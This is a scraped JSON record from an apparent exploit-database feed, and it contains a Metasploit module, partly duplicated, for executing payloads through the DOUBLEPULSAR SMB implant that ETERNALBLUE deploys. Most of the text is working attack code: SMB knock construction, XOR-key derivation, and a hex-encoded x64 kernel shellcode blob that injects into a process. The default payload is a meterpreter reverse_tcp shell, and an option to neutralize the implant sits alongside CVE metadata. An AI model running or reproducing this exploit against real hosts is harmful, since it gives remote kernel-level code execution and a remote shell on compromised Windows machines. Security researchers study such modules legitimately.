STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-10] #"}, "lastseen": "2021-09-09T22:15:20", "differentElements": ["sourceData"], "edition": 12}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "d59b203441edd7344c236c40170ccb5a", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-10T22:13:51", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142603", "PACKETSTORM:142548", "PACKETSTORM:142602", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27803", "1337DAY-ID-27786", 
"1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["700099.PRM", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96709", "SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": 
"trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-10T22:13:51", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-10T22:13:51", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current 
source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 
'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
